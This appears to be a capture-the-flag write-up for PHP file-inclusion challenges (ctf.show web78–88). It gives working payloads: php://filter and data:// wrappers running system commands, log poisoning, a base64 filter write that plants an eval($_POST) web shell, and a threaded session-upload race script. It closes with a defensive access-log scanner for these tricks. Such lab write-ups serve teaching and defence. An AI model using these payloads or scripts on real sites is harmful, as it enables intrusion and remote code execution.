WEB78
Nothing much to say here.
payload:?file=php://filter/read=convert.base64-encode/resource=flag.php
web79
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
Let's look at the source code first. The previous payload no longer works because the string "php" is filtered, so we switch to a different method. Reference article: https://www.freebuf.com/column/148886.html
Use a one-line PHP payload through the data:// wrapper:
payload:?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
Since that executes, we replace it with a payload that runs a command.
One pitfall here: the PHP tag must not be closed, so the payload is <?php system('cat flag.php');
payload:?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs=
web80
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
Reference article: local file inclusion
Log poisoning to get a shell
Intercept the request and modify the User-Agent
Connect with AntSword
The data:// wrapper can no longer be used with include here, and open_basedir needs to be bypassed
Reference link: seven ways to achieve command execution with PHP pseudo-protocols
/var/log/nginx/access.log
web81
Same as web80: include the log file.
web82_86
Just run the script directly.
import io
import requests
import threading

sessID = 'flag'
url = 'http://296b5d26-334c-4459-b7a6-b16db5aad264.challenge.ctf.show:8080/'

# 1. Set the signal.
# Event.set() sets the Event object's internal flag to true. isSet() reports the state of that flag: after set() has been called, isSet() returns True.
def write(session):
    # Writer threads keep posting an upload so the session file stays populated.
    while event.isSet():
        f = io.BytesIO(b'a' * 1024 * 50)
        response = session.post(
            url,
            cookies={
                'PHPSESSID': sessID},
            data={
                'PHP_SESSION_UPLOAD_PROGRESS': '<?php system("cat *.php");?>'},
            files={
                'file': ('test.txt', f)}
        )

def read(session):
    # Reader threads include the session file and stop everything once it hits.
    while event.isSet():
        response = session.get(url + '?file=/tmp/sess_{}'.format(sessID))
        if 'test' in response.text:
            print(response.text)
            event.clear()
        else:
            print('[*]retrying...')

if __name__ == '__main__':
    event = threading.Event()
    event.set()
    with requests.session() as session:
        for i in range(1, 30):
            threading.Thread(target=write, args=(session,)).start()
        for i in range(1, 30):
            threading.Thread(target=read, args=(session,)).start()
WEB87
Reference link
A variant of the die() ("death exit") bypass.
if(isset($_GET['file'])){
$file = $_GET['file'];
$content = $_POST['content'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
$file = str_replace(".", "???", $file);
file_put_contents(urldecode($file), "<?php die('大佬别秀了');?>".$content);
}else{
highlight_file(__FILE__);
}
This can be bypassed with base64: once the non-base64 characters are dropped, "phpdie" happens to be exactly 6 bytes, and adding 2 more makes a multiple of 4, so the whole prefix base64-decodes cleanly.
Construct the write filter
php://filter/write=convert.base64-decode/resource=1.php
then URL-encode it twice. Payload:
file=%25%37%30%25%36%38%25%37%30%25%33%61%25%32%66%25%32%66%25%36%36%25%36%39%25%36%63%25%37%34%25%36%35%25%37%32%25%32%66%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%64%25%36%33%25%36%66%25%36%65%25%37%36%25%36%35%25%37%32%25%37%34%25%32%65%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%64%25%36%34%25%36%35%25%36%33%25%36%66%25%36%34%25%36%35%25%32%66%25%37%32%25%36%35%25%37%33%25%36%66%25%37%35%25%37%32%25%36%33%25%36%35%25%33%64%25%33%31%25%32%65%25%37%30%25%36%38%25%37%30
content=aaPD9waHAgQGV2YWwoJF9QT1NUWzFdKTs/Pg==
Reference on the use of php://filter: "Talking about the magic of php://filter"
web88
if(isset($_GET['file'])){
$file = $_GET['file'];
if(preg_match("/php|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\-|\_|\+|\=|\./i", $file)){
die("error");
}
include($file);
}else{
highlight_file(__FILE__);
}
1. "." is filtered, so the file:// wrapper cannot be used.
2. "php" is filtered, so the php:// wrapper cannot be used.
3. The absolute path is unknown, so the zip:// & bzip2:// & zlib:// wrappers cannot be used.
4. Not filtered: the data:// wrapper can be used.
payload (remember to delete the trailing = sign, because = is filtered)
?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZionKTsgPz4
Reference article: using the data:// pseudo-protocol to bypass filtering of parentheses and backticks.
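From the defender's side, the techniques in this writeup (php:// and data:// wrappers in the include parameter, the double-encoded web87 payload, log poisoning through the User-Agent, and the /tmp/sess_ race) all leave traces in the web server's access log. The following Python scanner is an added example, not part of the original post; the parameter names in INCLUDE_PARAMS and the log lines in SAMPLE_LOG are assumptions constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Hypothetical detector for the inclusion tricks in this writeup: wrappers in
# ?file=, log/session paths, nested URL encoding, and <?php planted via User-Agent.
LOG_RE = re.compile(r'"(?:GET|POST) (?P<target>\S+) HTTP/[^"]*" \d+ \S+ "[^"]*" "(?P<ua>[^"]*)"')
WRAPPER_RE = re.compile(r'^(php|data|zip|bzip2|zlib|phar|glob|expect|file)://', re.I)
SENSITIVE_RE = re.compile(r'/var/log/|/tmp/sess_|\.\./', re.I)
INCLUDE_PARAMS = {'file', 'page', 'include', 'template'}  # assumed parameter names

def fully_decode(value, max_rounds=5):
    # Peel nested percent-encoding (the web87 payload is encoded twice).
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_request(target, user_agent=''):
    # Return a short finding label for one request, or None if it looks clean.
    if '<?' in user_agent:  # log poisoning: PHP opened via the User-Agent
        return 'ua-php-tag'
    for name, values in parse_qs(urlparse(target).query, keep_blank_values=True).items():
        if name.lower() in INCLUDE_PARAMS:
            for value in map(fully_decode, values):
                m = WRAPPER_RE.match(value)
                if m:
                    return 'wrapper:' + m.group(1).lower()
                if SENSITIVE_RE.search(value):
                    return 'sensitive-path'
    return None

def scan_log(lines):
    # Return [(line_number, finding)] for every suspicious access-log line.
    findings = []
    for number, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        finding = classify_request(m.group('target'), m.group('ua')) if m else None
        if finding:
            findings.append((number, finding))
    return findings

SAMPLE_LOG = [  # constructed nginx "combined" lines, not real traffic
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?file=php://filter/read=convert.base64-encode/resource=flag.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4= HTTP/1.1" 200 3000 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /?file=/var/log/nginx/access.log HTTP/1.1" 200 70000 "-" "<?php phpinfo(); ?>"',
    '10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /?file=%2570%2568%2570%253a%252f%252ffilter HTTP/1.1" 200 10 "-" "curl/8.0"',
]
```

Running scan_log(SAMPLE_LOG) flags lines 2 through 5 and leaves the plain /index.php request alone; the double-encoded line 5 is recognised only because fully_decode() keeps unquoting until the value stops changing.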